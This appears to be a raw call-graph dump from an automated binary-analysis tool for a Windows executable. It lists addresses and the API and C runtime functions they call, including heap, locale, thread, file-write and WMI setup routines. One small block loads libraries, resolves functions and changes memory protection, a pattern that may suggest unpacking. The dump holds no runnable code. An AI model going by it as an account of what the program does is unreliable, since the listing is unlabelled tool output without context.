20468->20472 20470 2417bc 20469->20470 20471 2417df 20470->20471 20473 521898 __freea 14 API calls 20470->20473 20471->20383 20472->20383 20474 2417cf 20473->20474 20475 521898 __freea 14 API calls 20474->20475 20476 2417d7 20475->20476 20477 521898 __freea 14 API calls 20476->20477 20477->20471 20479 5009cc std::_Lockit::_Lockit 7 API calls 20478->20479 20480 210abe 20479->20480 20481 5009cc std::_Lockit::_Lockit 7 API calls 20480->20481 20483 210b00 20480->20483 20482 210ae0 20481->20482 20486 500a24 std::_Lockit::~_Lockit 2 API calls 20482->20486 20488 210b55 20483->20488 20490 510a59 std::_Facet_Register 16 API calls 20483->20490 20484 500a24 std::_Lockit::~_Lockit 2 API calls 20485 210bdd 20484->20485 20487 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20485->20487 20486->20483 20489 210bf6 20487->20489 20488->20484 20489->20386 20491 210b60 20490->20491 20492 20eff0 94 API calls 20491->20492 20493 210b90 20492->20493 20494 500ff7 __Getctype 71 API calls 20493->20494 20495 210ba6 20494->20495 20496 20f0a0 92 API calls 20495->20496 20497 210bb8 20496->20497 20498 500d34 std::_Facet_Register 16 API calls 20497->20498 20498->20488 20500 286a67 20499->20500 20501 286a47 20499->20501 20502 286a79 20500->20502 20503 286b3e 20500->20503 20501->20386 20506 20b5b0 23 API calls 20502->20506 20504 209560 2 API calls 20503->20504 20505 286ab6 std::locale::_Locimp::_Locimp 20504->20505 20507 5215e8 7 API calls 20505->20507 20509 286b03 std::ios_base::_Ios_base_dtor std::locale::_Locimp::_Locimp 20505->20509 20506->20505 20508 286b48 20507->20508 20510 510a59 std::_Facet_Register 16 API calls 20508->20510 20509->20386 20511 286b8a 20510->20511 20512 500d66 std::locale::_Init 72 API calls 20511->20512 20513 286ba1 20512->20513 20513->20386 20515 536413 __Getctype 66 API calls 20514->20515 20516 52a2b1 20515->20516 20517 536665 __Getctype 66 API calls 20516->20517 20518 52a2c1 20517->20518 20518->20395 20520 20e0cd 20519->20520 20523 20e11a std::ios_base::_Ios_base_dtor 20519->20523 20521 20e0e3 20520->20521 20522 20a680 7 API calls 20520->20522 20521->20523 20524 5215e8 7 API calls 20521->20524 20522->20520 20523->20407 20525 20e14e 20524->20525 20527 2741b7 20526->20527 20528 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20527->20528 20529 2741cd 20528->20529 20529->20083 20016 b49970 20017 b49980 20016->20017 20018 b49a9a LoadLibraryA 20017->20018 20022 b49adf VirtualProtect VirtualProtect 20017->20022 20019 b49ab1 20018->20019 20019->20017 20021 b49ac3 GetProcAddress 20019->20021 20021->20019 20024 b49ad9 ExitProcess 20021->20024 20023 b49b44 20022->20023 20023->20023 18157 52e45b 18158 52e467 std::_Locinfo::_Locinfo_ctor 18157->18158 18159 52e47b 18158->18159 18160 52e46e GetLastError RtlExitUserThread 18158->18160 18171 536413 GetLastError 18159->18171 18160->18159 18166 52e497 18203 52e63a 18166->18203 18168 52e4b9 18216 533589 18168->18216 18172 536430 18171->18172 18173 53642a 18171->18173 18195 536436 SetLastError 18172->18195 18224 537ef7 18172->18224 18219 537eb8 18173->18219 18180 536466 18186 537ef7 __dosmaperr 6 API calls 18180->18186 18181 53647d 18185 537ef7 __dosmaperr 6 API calls 18181->18185 18182 52e480 18198 53b2d6 18182->18198 18183 5364ca 18247 52df58 18183->18247 18188 536489 18185->18188 18189 536474 18186->18189 18190 53649e 18188->18190 18191 53648d 18188->18191 18236 535d79 18189->18236 18242 536241 18190->18242 18192 537ef7 __dosmaperr 6 API calls 18191->18192 18192->18189 18195->18182 18195->18183 18197 535d79 _free 14 API calls 18197->18195 18199 53b2e8 GetPEB 18198->18199 18201 52e48b 18198->18201 18200 53b2fb 18199->18200 18199->18201 18866 537d2a 18200->18866 18201->18166 18213 5381df 18201->18213 18869 52e510 18203->18869 18205 52e647 18206 536413 __Getctype 66 API calls 18205->18206 18210 52e667 18205->18210 18207 52e688 18206->18207 18208 536665 __Getctype 66 API calls 18207->18208 18209 52e698 18208->18209 18209->18210 18886 538e57 18209->18886 18210->18168 18214 537c67 std::_Lockit::_Lockit 5 API calls 18213->18214 18215 5381fb 18214->18215 18215->18166 18217 53656a __dosmaperr 14 API calls 18216->18217 18218 52e4ca 18217->18218 18258 537c67 18219->18258 18222 537eef TlsGetValue 18223 537edd 18223->18172 18225 537c67 std::_Lockit::_Lockit 5 API calls 18224->18225 18226 537f13 18225->18226 18227 537f31 TlsSetValue 18226->18227 18228 53644e 18226->18228 18228->18195 18229 538548 18228->18229 18234 538555 __dosmaperr 18229->18234 18230 538595 18275 528e21 18230->18275 18231 538580 RtlAllocateHeap 18232 53645e 18231->18232 18231->18234 18232->18180 18232->18181 18234->18230 18234->18231 18272 533080 18234->18272 18237 535d84 RtlFreeHeap 18236->18237 18241 535dad _free 18236->18241 18238 535d99 18237->18238 18237->18241 18239 528e21 _free 12 API calls 18238->18239 18240 535d9f GetLastError 18239->18240 18240->18241 18241->18195 18312 5360d5 18242->18312 18454 53a11f 18247->18454 18250 52df68 18252 52df72 IsProcessorFeaturePresent 18250->18252 18253 52df91 18250->18253 18254 52df7e 18252->18254 18499 5312ca 18253->18499 18502 52142c 18254->18502 18259 537c95 18258->18259 18263 537c91 18258->18263 18259->18263 18265 537ba0 18259->18265 18262 537caf GetProcAddress 18262->18263 18264 537cbf std::_Lockit::_Lockit 18262->18264 18263->18222 18263->18223 18264->18263 18270 537bb1 std::_Lockit::_Lockit 18265->18270 18266 537c5c 18266->18262 18266->18263 18267 537bcf LoadLibraryExW 18268 537bea GetLastError 18267->18268 18267->18270 18268->18270 18269 537c45 FreeLibrary 18269->18270 18270->18266 18270->18267 18270->18269 18271 537c1d LoadLibraryExW 18270->18271 18271->18270 18278 5330ad 18272->18278 18289 53656a GetLastError 18275->18289 18277 528e26 18277->18232 18279 5330b9 std::_Locinfo::_Locinfo_ctor 18278->18279 18284 5325b9 RtlEnterCriticalSection 18279->18284 18281 5330c4 18285 533100 18281->18285 18284->18281 18288 532601 RtlLeaveCriticalSection 18285->18288 18287 53308b 18287->18234 18288->18287 18290 536581 18289->18290 18293 536587 18289->18293 18291 537eb8 __dosmaperr 6 API calls 18290->18291 18291->18293 18292 537ef7 __dosmaperr 6 API calls 18294 5365a5 18292->18294 18293->18292 18309 53658d SetLastError 18293->18309 18295 538548 __dosmaperr 12 API calls 18294->18295 18294->18309 18297 5365b5 18295->18297 18298 5365d4 18297->18298 18299 5365bd 18297->18299 18300 537ef7 __dosmaperr 6 API calls 18298->18300 18301 537ef7 __dosmaperr 6 API calls 18299->18301 18302 5365e0 18300->18302 18303 5365cb 18301->18303 18304 5365f5 18302->18304 18305 5365e4 18302->18305 18306 535d79 _free 12 API calls 18303->18306 18308 536241 __dosmaperr 12 API calls 18304->18308 18307 537ef7 __dosmaperr 6 API calls 18305->18307 18306->18309 18307->18303 18310 536600 18308->18310 18309->18277 18311 535d79 _free 12 API calls 18310->18311 18311->18309 18313 5360e1 std::_Locinfo::_Locinfo_ctor 18312->18313 18326 5325b9 RtlEnterCriticalSection 18313->18326 18315 5360eb 18327 53611b 18315->18327 18318 5361e7 18319 5361f3 std::_Locinfo::_Locinfo_ctor 18318->18319 18331 5325b9 RtlEnterCriticalSection 18319->18331 18321 5361fd 18332 5363c8 18321->18332 18323 536215 18336 536235 18323->18336 18326->18315 18330 532601 RtlLeaveCriticalSection 18327->18330 18329 536109 18329->18318 18330->18329 18331->18321 18333 5363fe __Getctype 18332->18333 18334 5363d7 __Getctype 18332->18334 18333->18323 18334->18333 18339 540700 18334->18339 18453 532601 RtlLeaveCriticalSection 18336->18453 18338 536223 18338->18197 18340 540780 18339->18340 18343 540716 18339->18343 18341 5407ce 18340->18341 18344 535d79 _free 14 API calls 18340->18344 18407 540871 18341->18407 18343->18340 18345 540749 18343->18345 18350 535d79 _free 14 API calls 18343->18350 18346 5407a2 18344->18346 18347 54076b 18345->18347 18355 535d79 _free 14 API calls 18345->18355 18348 535d79 _free 14 API calls 18346->18348 18349 535d79 _free 14 API calls 18347->18349 18351 5407b5 18348->18351 18352 540775 18349->18352 18354 54073e 18350->18354 18356 535d79 _free 14 API calls 18351->18356 18357 535d79 _free 14 API calls 18352->18357 18353 54083c 18358 535d79 _free 14 API calls 18353->18358 18367 53f9fa 18354->18367 18360 540760 18355->18360 18361 5407c3 18356->18361 18357->18340 18362 540842 18358->18362 18395 53feae 18360->18395 18365 535d79 _free 14 API calls 18361->18365 18362->18333 18363 5407dc 18363->18353 18366 535d79 14 API calls _free 18363->18366 18365->18341 18366->18363 18368 53faf4 18367->18368 18369 53fa0b 18367->18369 18368->18345 18370 53fa1c 18369->18370 18372 535d79 _free 14 API calls 18369->18372 18371 53fa2e 18370->18371 18373 535d79 _free 14 API calls 18370->18373 18374 53fa40 18371->18374 18375 535d79 _free 14 API calls 18371->18375 18372->18370 18373->18371 18376 53fa52 18374->18376 18377 535d79 _free 14 API calls 18374->18377 18375->18374 18378 53fa64 18376->18378 18380 535d79 _free 14 API calls 18376->18380 18377->18376 18379 53fa76 18378->18379 18381 535d79 _free 14 API calls 18378->18381 18382 53fa88 18379->18382 18383 535d79 _free 14 API calls 18379->18383 18380->18378 18381->18379 18384 53fa9a 18382->18384 18385 535d79 _free 14 API calls 18382->18385 18383->18382 18386 53faac 18384->18386 18388 535d79 _free 14 API calls 18384->18388 18385->18384 18387 53fabe 18386->18387 18389 535d79 _free 14 API calls 18386->18389 18390 53fad0 18387->18390 18391 535d79 _free 14 API calls 18387->18391 18388->18386 18389->18387 18392 53fae2 18390->18392 18393 535d79 _free 14 API calls 18390->18393 18391->18390 18392->18368 18394 535d79 _free 14 API calls 18392->18394 18393->18392 18394->18368 18396 53ff13 18395->18396 18397 53febb 18395->18397 18396->18347 18398 53fecb 18397->18398 18399 535d79 _free 14 API calls 18397->18399 18400 53fedd 18398->18400 18401 535d79 _free 14 API calls 18398->18401 18399->18398 18402 53feef 18400->18402 18403 535d79 _free 14 API calls 18400->18403 18401->18400 18404 53ff01 18402->18404 18405 535d79 _free 14 API calls 18402->18405 18403->18402 18404->18396 18406 535d79 _free 14 API calls 18404->18406 18405->18404 18406->18396 18408 54087e 18407->18408 18412 54089d 18407->18412 18408->18412 18413 5403d9 18408->18413 18411 535d79 _free 14 API calls 18411->18412 18412->18363 18414 5404b7 18413->18414 18415 5403ea 18413->18415 18414->18411 18449 540125 18415->18449 18418 540125 __Getctype 14 API calls 18419 5403fd 18418->18419 18420 540125 __Getctype 14 API calls 18419->18420 18421 540408 18420->18421 18422 540125 __Getctype 14 API calls 18421->18422 18423 540413 18422->18423 18424 540125 __Getctype 14 API calls 18423->18424 18425 540421 18424->18425 18426 535d79 _free 14 API calls 18425->18426 18427 54042c 18426->18427 18428 535d79 _free 14 API calls 18427->18428 18429 540437 18428->18429 18430 535d79 _free 14 API calls 18429->18430 18431 540442 18430->18431 18432 540125 __Getctype 14 API calls 18431->18432 18433 540450 18432->18433 18434 540125 __Getctype 14 API calls 18433->18434 18435 54045e 18434->18435 18436 540125 __Getctype 14 API calls 18435->18436 18437 54046f 18436->18437 18438 540125 __Getctype 14 API calls 18437->18438 18439 54047d 18438->18439 18440 540125 __Getctype 14 API calls 18439->18440 18441 54048b 18440->18441 18442 535d79 _free 14 API calls 18441->18442 18443 540496 18442->18443 18444 535d79 _free 14 API calls 18443->18444 18445 5404a1 18444->18445 18446 535d79 _free 14 API calls 18445->18446 18447 5404ac 18446->18447 18448 535d79 _free 14 API calls 18447->18448 18448->18414 18450 540158 18449->18450 18451 540148 18449->18451 18450->18418 18451->18450 18452 535d79 _free 14 API calls 18451->18452 18452->18451 18453->18338 18508 53a051 18454->18508 18457 53a164 18458 53a170 std::_Locinfo::_Locinfo_ctor 18457->18458 18459 53656a __dosmaperr 14 API calls 18458->18459 18462 53a19d std::locale::_Setgloballocale 18458->18462 18465 53a197 std::locale::_Setgloballocale 18458->18465 18459->18465 18460 53a1e4 18461 528e21 _free 14 API calls 18460->18461 18463 53a1ce __Getctype 18461->18463 18464 53a210 18462->18464 18535 5325b9 RtlEnterCriticalSection 18462->18535 18463->18250 18468 53a343 18464->18468 18469 53a252 18464->18469 18483 53a281 18464->18483 18465->18460 18465->18462 18465->18463 18471 53a34e 18468->18471 18540 532601 RtlLeaveCriticalSection 18468->18540 18475 536413 __Getctype 66 API calls 18469->18475 18469->18483 18472 5312ca std::locale::_Setgloballocale 23 API calls 18471->18472 18474 53a356 18472->18474 18519 5371ce 18474->18519 18478 53a276 18475->18478 18477 536413 __Getctype 66 API calls 18488 53a2d6 18477->18488 18480 536413 __Getctype 66 API calls 18478->18480 18479 53a364 18481 53a370 18479->18481 18482 53a38c 18479->18482 18480->18483 18484 528e21 _free 14 API calls 18481->18484 18485 53a3a7 18482->18485 18486 53a39a 18482->18486 18536 53a2f0 18483->18536 18489 53a375 18484->18489 18487 53a3ba 18485->18487 18541 53a6d5 18485->18541 18490 528e21 _free 14 API calls 18486->18490 18487->18489 18492 53a41c 18487->18492 18549 53720a 18487->18549 18488->18463 18494 536413 __Getctype 66 API calls 18488->18494 18489->18250 18490->18489 18524 53a53b 18492->18524 18494->18463 18794 531161 18499->18794 18503 521448 std::locale::_Setgloballocale 18502->18503 18504 521474 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18503->18504 18507 521545 std::locale::_Setgloballocale 18504->18507 18505 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 18506 521563 18505->18506 18506->18253 18507->18505 18509 53a05d std::_Locinfo::_Locinfo_ctor 18508->18509 18514 5325b9 RtlEnterCriticalSection 18509->18514 18511 53a06b 18515 53a0a9 18511->18515 18514->18511 18518 532601 RtlLeaveCriticalSection 18515->18518 18517 52df5d 18517->18250 18517->18457 18518->18517 18520 5371da 18519->18520 18521 5371ef 18519->18521 18522 528e21 _free 14 API calls 18520->18522 18521->18479 18523 5371df __Getctype 18522->18523 18523->18479 18525 5371ce std::locale::_Setgloballocale 14 API calls 18524->18525 18526 53a54a 18525->18526 18527 53a5ed 18526->18527 18528 53a55d 18526->18528 18529 53b00a std::locale::_Setgloballocale 66 API calls 18527->18529 18530 53a57a 18528->18530 18533 53a59e 18528->18533 18532 53a42a 18529->18532 18563 53b00a 18530->18563 18532->18250 18533->18532 18560 53c22d 18533->18560 18535->18464 18537 53a2f6 18536->18537 18538 53a2c7 18536->18538 18793 532601 RtlLeaveCriticalSection 18537->18793 18538->18463 18538->18477 18538->18488 18540->18471 18542 53a6eb 18541->18542 18543 53a6ef 18541->18543 18542->18487 18544 52a93f std::locale::_Setgloballocale 14 API calls 18543->18544 18548 53a73e 18543->18548 18545 53a710 18544->18545 18546 53a718 SetFilePointerEx 18545->18546 18545->18548 18547 53a72f GetFileSizeEx 18546->18547 18546->18548 18547->18548 18548->18487 18550 537216 std::locale::_Setgloballocale 18549->18550 18551 537237 18550->18551 18552 5371ce std::locale::_Setgloballocale 14 API calls 18550->18552 18551->18492 18555 53b6b0 18551->18555 18553 537231 18552->18553 18554 543a2c std::locale::_Setgloballocale 14 API calls 18553->18554 18554->18551 18556 538548 __dosmaperr 14 API calls 18555->18556 18557 53b6cd 18556->18557 18558 535d79 _free 14 API calls 18557->18558 18559 53b6d7 18558->18559 18559->18492 18586 53c0a5 18560->18586 18562 53c243 18562->18532 18564 53b016 std::_Locinfo::_Locinfo_ctor 18563->18564 18565 53b036 18564->18565 18566 53b01e 18564->18566 18568 53b0d1 18565->18568 18572 53b068 18565->18572 18567 528e0e __dosmaperr 14 API calls 18566->18567 18569 53b023 18567->18569 18570 528e0e __dosmaperr 14 API calls 18568->18570 18573 528e21 _free 14 API calls 18569->18573 18571 53b0d6 18570->18571 18574 528e21 _free 14 API calls 18571->18574 18642 52a6c3 RtlEnterCriticalSection 18572->18642 18576 53b02b __Getctype 18573->18576 18574->18576 18576->18532 18577 53b06e 18578 53b08a 18577->18578 18579 53b09f 18577->18579 18580 528e21 _free 14 API calls 18578->18580 18643 53b0fc 18579->18643 18582 53b08f 18580->18582 18584 528e0e __dosmaperr 14 API calls 18582->18584 18583 53b09a 18685 53b0c9 18583->18685 18584->18583 18587 53c0b1 std::_Locinfo::_Locinfo_ctor 18586->18587 18588 53c0d1 18587->18588 18589 53c0b9 18587->18589 18591 53c182 18588->18591 18596 53c106 18588->18596 18619 528e0e 18589->18619 18593 528e0e __dosmaperr 14 API calls 18591->18593 18595 53c187 18593->18595 18594 528e21 _free 14 API calls 18599 53c0c6 __Getctype 18594->18599 18597 528e21 _free 14 API calls 18595->18597 18609 52a6c3 RtlEnterCriticalSection 18596->18609 18597->18599 18599->18562 18600 53c10c 18601 53c130 18600->18601 18602 53c145 18600->18602 18604 528e21 _free 14 API calls 18601->18604 18610 53c1b1 18602->18610 18606 53c135 18604->18606 18605 53c140 18622 53c17a 18605->18622 18607 528e0e __dosmaperr 14 API calls 18606->18607 18607->18605 18609->18600 18625 52a93f 18610->18625 18612 53c1c3 18613 53c1cb 18612->18613 18614 53c1dc SetFilePointerEx 18612->18614 18615 528e21 _free 14 API calls 18613->18615 18616 53c1f4 GetLastError 18614->18616 18618 53c1d0 18614->18618 18615->18618 18636 528deb 18616->18636 18618->18605 18620 53656a __dosmaperr 14 API calls 18619->18620 18621 528e13 18620->18621 18621->18594 18641 52a778 RtlLeaveCriticalSection 18622->18641 18624 53c180 18624->18599 18626 52a94c 18625->18626 18630 52a961 18625->18630 18627 528e0e __dosmaperr 14 API calls 18626->18627 18629 52a951 18627->18629 18628 528e0e __dosmaperr 14 API calls 18632 52a991 18628->18632 18633 528e21 _free 14 API calls 18629->18633 18630->18628 18631 52a986 18630->18631 18631->18612 18634 528e21 _free 14 API calls 18632->18634 18635 52a959 __Getctype 18633->18635 18634->18635 18635->18612 18637 528e0e __dosmaperr 14 API calls 18636->18637 18638 528df6 _free 18637->18638 18639 528e21 _free 14 API calls 18638->18639 18640 528e09 18639->18640 18640->18618 18641->18624 18642->18577 18644 53b11e 18643->18644 18656 53b12f __Getctype 18643->18656 18645 53b122 18644->18645 18647 53b172 18644->18647 18646 528e0e __dosmaperr 14 API calls 18645->18646 18648 53b127 18646->18648 18649 53b188 18647->18649 18688 53c248 18647->18688 18650 528e21 _free 14 API calls 18648->18650 18691 53aca3 18649->18691 18650->18656 18654 53b196 18659 53b19a 18654->18659 18660 53b1bc 18654->18660 18655 53b1cf 18657 53b1e3 18655->18657 18658 53b229 WriteFile 18655->18658 18656->18583 18663 53b1eb 18657->18663 18664 53b219 18657->18664 18661 53b24c GetLastError 18658->18661 18677 53b207 18658->18677 18665 53b296 18659->18665 18705 53ac3b 18659->18705 18710 53a88f GetConsoleOutputCP 18660->18710 18661->18677 18666 53b1f0 18663->18666 18667 53b209 18663->18667 18698 53ad14 18664->18698 18665->18656 18670 528e21 _free 14 API calls 18665->18670 18666->18665 18672 53b1f9 18666->18672 18730 53aed8 18667->18730 18674 53b2b7 18670->18674 18671 53b1b2 18671->18656 18671->18665 18675 53b26c 18671->18675 18723 53adef 18672->18723 18678 528e0e __dosmaperr 14 API calls 18674->18678 18679 53b273 18675->18679 18680 53b28a 18675->18680 18677->18671 18678->18656 18681 528e21 _free 14 API calls 18679->18681 18682 528deb __dosmaperr 14 API calls 18680->18682 18683 53b278 18681->18683 18682->18656 18684 528e0e __dosmaperr 14 API calls 18683->18684 18684->18656 18792 52a778 RtlLeaveCriticalSection 18685->18792 18687 53b0cf 18687->18576 18689 53c1b1 std::locale::_Setgloballocale 16 API calls 18688->18689 18690 53c25e 18689->18690 18690->18649 18738 543a2c 18691->18738 18693 53ad0a 18693->18654 18693->18655 18694 53acb4 18694->18693 18695 536413 __Getctype 65 API calls 18694->18695 18696 53acd7 18695->18696 18696->18693 18697 53acf1 GetConsoleMode 18696->18697 18697->18693 18703 53ad23 std::locale::_Setgloballocale 18698->18703 18699 53add4 18745 510a46 18699->18745 18701 53aded 18701->18671 18702 53ad93 WriteFile 18702->18703 18704 53add6 GetLastError 18702->18704 18703->18699 18703->18702 18704->18699 18706 53ac5d 18705->18706 18707 53ac92 18705->18707 18706->18707 18708 544f9d 5 API calls std::locale::_Setgloballocale 18706->18708 18709 53ac94 GetLastError 18706->18709 18707->18671 18708->18706 18709->18707 18750 51dc52 18710->18750 18713 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 18714 53ac39 18713->18714 18714->18671 18715 535f43 62 API calls __fassign 18719 53a8eb std::locale::_Locimp::_Locimp 18715->18719 18716 53ab91 18716->18713 18717 5421ff 15 API calls __cftoe 18717->18719 18719->18715 18719->18716 18719->18717 18720 53ab14 WriteFile 18719->18720 18722 53ab4c WriteFile 18719->18722 18758 5328bc 18719->18758 18763 53c72c 18719->18763 18720->18719 18721 53ac09 GetLastError 18720->18721 18721->18716 18722->18719 18722->18721 18724 53adfe std::locale::_Setgloballocale 18723->18724 18725 53aebd 18724->18725 18727 53ae73 WriteFile 18724->18727 18726 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 18725->18726 18728 53aed6 18726->18728 18727->18724 18729 53aebf GetLastError 18727->18729 18728->18677 18729->18725 18731 53aee7 std::locale::_Setgloballocale 18730->18731 18734 53c72c std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18731->18734 18735 53aff1 GetLastError 18731->18735 18736 53afa6 WriteFile 18731->18736 18737 53afef 18731->18737 18732 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 18733 53b008 18732->18733 18733->18677 18734->18731 18735->18737 18736->18731 18736->18735 18737->18732 18739 543a46 18738->18739 18740 543a39 18738->18740 18742 543a52 18739->18742 18743 528e21 _free 14 API calls 18739->18743 18741 528e21 _free 14 API calls 18740->18741 18744 543a3e __Getctype 18741->18744 18742->18694 18743->18744 18744->18694 18746 510a4f IsProcessorFeaturePresent 18745->18746 18747 510a4e 18745->18747 18749 510b00 18746->18749 18747->18701 18749->18701 18751 51dc72 18750->18751 18752 51dc69 18750->18752 18751->18752 18753 536413 __Getctype 66 API calls 18751->18753 18752->18719 18754 51dc92 18753->18754 18766 536665 18754->18766 18759 536413 __Getctype 66 API calls 18758->18759 18760 5328c7 18759->18760 18761 536665 __Getctype 66 API calls 18760->18761 18762 5328d7 18761->18762 18762->18719 18764 53c743 WideCharToMultiByte 18763->18764 18764->18719 18767 536678 18766->18767 18769 51dca8 18766->18769 18767->18769 18774 54094c 18767->18774 18770 536692 18769->18770 18771 5366a5 18770->18771 18772 5366ba 18770->18772 18771->18772 18787 53ef2b 18771->18787 18772->18752 18775 540958 std::_Locinfo::_Locinfo_ctor 18774->18775 18776 536413 __Getctype 66 API calls 18775->18776 18777 540961 18776->18777 18778 5325b9 std::_Lockit::_Lockit RtlEnterCriticalSection 18777->18778 18784 5409a7 18777->18784 18779 54097f 18778->18779 18780 5409cd __Getctype 14 API calls 18779->18780 18781 540990 18780->18781 18782 5409ac __Getctype RtlLeaveCriticalSection 18781->18782 18783 5409a3 18782->18783 18783->18784 18785 52df58 __Getctype 66 API calls 18783->18785 18784->18769 18786 5409cc 18785->18786 18788 536413 __Getctype 66 API calls 18787->18788 18789 53ef35 18788->18789 18790 53ee43 __fassign 66 API calls 18789->18790 18791 53ef3b 18790->18791 18791->18772 18792->18687 18793->18538 18795 531181 18794->18795 18796 53116f 18794->18796 18807 531008 18795->18807 18815 531207 GetModuleHandleW 18796->18815 18801 52df9b 18802 5311bc 18822 5311c5 18802->18822 18808 531014 std::_Locinfo::_Locinfo_ctor 18807->18808 18830 5325b9 RtlEnterCriticalSection 18808->18830 18810 53101e 18831 531074 18810->18831 18812 53102b 18835 531049 18812->18835 18816 531174 18815->18816 18816->18795 18817 53124a GetModuleHandleExW 18816->18817 18818 531269 GetProcAddress 18817->18818 18819 53127e 18817->18819 18818->18819 18820 531292 FreeLibrary 18819->18820 18821 531180 18819->18821 18820->18821 18821->18795 18859 53b31a GetPEB 18822->18859 18825 5311f4 18828 53124a std::locale::_Setgloballocale 3 API calls 18825->18828 18826 5311d4 GetPEB 18826->18825 18827 5311e4 GetCurrentProcess TerminateProcess 18826->18827 18827->18825 18829 5311fc ExitProcess 18828->18829 18830->18810 18832 531080 std::_Locinfo::_Locinfo_ctor 18831->18832 18834 5310e1 std::locale::_Setgloballocale 18832->18834 18838 534177 18832->18838 18834->18812 18858 532601 RtlLeaveCriticalSection 18835->18858 18837 531037 18837->18801 18837->18802 18841 533ea8 18838->18841 18842 533eb4 std::_Locinfo::_Locinfo_ctor 18841->18842 18849 5325b9 RtlEnterCriticalSection 18842->18849 18844 533ec2 18850 534087 18844->18850 18849->18844 18851 533ecf 18850->18851 18852 5340a6 18850->18852 18854 533ef7 18851->18854 18852->18851 18853 535d79 _free 14 API calls 18852->18853 18853->18851 18857 532601 RtlLeaveCriticalSection 18854->18857 18856 533ee0 18856->18834 18857->18856 18858->18837 18860 53b334 18859->18860 18862 5311cf 18859->18862 18863 537cea 18860->18863 18862->18825 18862->18826 18864 537c67 std::_Lockit::_Lockit 5 API calls 18863->18864 18865 537d06 18864->18865 18865->18862 18867 537c67 std::_Lockit::_Lockit 5 API calls 18866->18867 18868 537d46 18867->18868 18868->18201 18870 53656a __dosmaperr 14 API calls 18869->18870 18871 52e51b 18870->18871 18872 52e55d RtlExitUserThread 18871->18872 18874 52e534 18871->18874 18893 53821a 18871->18893 18873 538548 __dosmaperr 14 API calls 18872->18873 18875 52e578 18873->18875 18877 52e547 18874->18877 18879 52e540 CloseHandle 18874->18879 18878 535d79 _free 14 API calls 18875->18878 18877->18872 18881 52e553 FreeLibraryAndExitThread 18877->18881 18880 52e585 18878->18880 18879->18877 18882 52e5a9 18880->18882 18883 52e58c GetModuleHandleExW 18880->18883 18881->18872 18896 52e4d9 18882->18896 18883->18882 18887 51dc52 __fassign 66 API calls 18886->18887 18888 538e74 18887->18888 18892 538e84 18888->18892 18904 53d096 18888->18904 18890 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 18891 52e6ca 18890->18891 18891->18168 18892->18890 18894 537c67 std::_Lockit::_Lockit 5 API calls 18893->18894 18895 538233 18894->18895 18895->18874 18897 52e4e5 18896->18897 18898 52e509 18896->18898 18899 52e4f4 18897->18899 18900 52e4eb CloseHandle 18897->18900 18898->18205 18901 52e503 18899->18901 18902 52e4fa FreeLibrary 18899->18902 18900->18899 18903 535d79 _free 14 API calls 18901->18903 18902->18901 18903->18898 18905 51dc52 __fassign 65 API calls 18904->18905 18906 53d0b6 18905->18906 18919 53794e 18906->18919 18908 53d174 18910 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 18908->18910 18909 53d0e3 18909->18908 18915 53d109 __fassign std::locale::_Setgloballocale 18909->18915 18922 535db3 18909->18922 18911 53d197 18910->18911 18911->18892 18912 53d16e 18929 50426e 18912->18929 18915->18912 18916 53794e __fassign MultiByteToWideChar 18915->18916 18917 53d157 18916->18917 18917->18912 18918 53d15e GetStringTypeW 18917->18918 18918->18912 18920 53795f MultiByteToWideChar 18919->18920 18920->18909 18923 535df1 18922->18923 18928 535dc1 __dosmaperr 18922->18928 18925 528e21 _free 14 API calls 18923->18925 18924 535ddc RtlAllocateHeap 18926 535def 18924->18926 18924->18928 18925->18926 18926->18915 18927 533080 std::_Facet_Register 2 API calls 18927->18928 18928->18923 18928->18924 18928->18927 18930 504278 18929->18930 18931 504289 18929->18931 18930->18931 18933 521898 18930->18933 18931->18908 18934 535d79 _free 14 API calls 18933->18934 18935 5218b0 18934->18935 18935->18931 20025 521898 20026 535d79 _free 14 API calls 20025->20026 20027 5218b0 20026->20027 18936 3d24b0 CoInitializeEx 18937 3d250c CoCreateInstance 18936->18937 18938 3d2a17 18936->18938 18939 3d2533 18937->18939 18999 3d29b9 std::ios_base::_Ios_base_dtor 18937->18999 18940 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 18938->18940 19010 2e8eb0 18939->19010 18943 3d2a30 18940->18943 18942 3d2a11 CoUninitialize 18942->18938 18944 3d2547 19017 2e8f70 18944->19017 18946 3d258f 18947 3d2597 CoSetProxyBlanket 18946->18947 18946->18999 18948 3d25b6 18947->18948 18947->18999 19021 2e8e10 18948->19021 18950 3d25ca 18951 2e8e10 22 API calls 18950->18951 18952 3d25e0 18951->18952 18953 2e8f70 SysFreeString 18952->18953 18954 3d2623 18953->18954 18955 2e8f70 SysFreeString 18954->18955 18956 3d2632 18955->18956 18956->18999 19026 510a59 18956->19026 18958 3d2696 18959 2e8e10 22 API calls 18958->18959 18960 3d26be 18959->18960 18961 2e8f70 SysFreeString 18960->18961 18964 3d26fa 18961->18964 18962 3d27ac VariantClear 18963 2e8e10 22 API calls 18962->18963 18968 3d27c3 18963->18968 18964->18962 19035 3c6bc0 18964->19035 18972 2e8f70 SysFreeString 18968->18972 18969 3d276e 19055 22a250 18969->19055 18971 3d277e 18973 3d2798 18971->18973 19076 20a8b0 18971->19076 18974 3d27ff 18972->18974 19104 20a680 18973->19104 18976 3d2877 VariantClear 18974->18976 18979 3d280a SysStringLen 18974->18979 18978 2e8e10 22 API calls 18976->18978 18986 3d288e 18978->18986 18979->18976 18981 3d2817 18979->18981 18980 3d27a0 18982 20a680 7 API calls 18980->18982 18983 20b1c0 23 API calls 18981->18983 18982->18962 18984 3d283b 18983->18984 18985 22a250 23 API calls 18984->18985 18987 3d284e 18985->18987 18989 2e8f70 SysFreeString 18986->18989 18988 20a8b0 23 API calls 18987->18988 18990 3d286b 18988->18990 18991 3d28ca 18989->18991 18992 20a680 7 API calls 18990->18992 18993 3d2966 VariantClear 18991->18993 18995 20b1c0 23 API calls 18991->18995 18992->18976 18994 3d29a1 18993->18994 19000 3d297a 18993->19000 19129 20df00 18994->19129 18998 3d2901 18995->18998 19109 3cb9f0 18998->19109 18999->18938 18999->18942 19000->18994 19116 279180 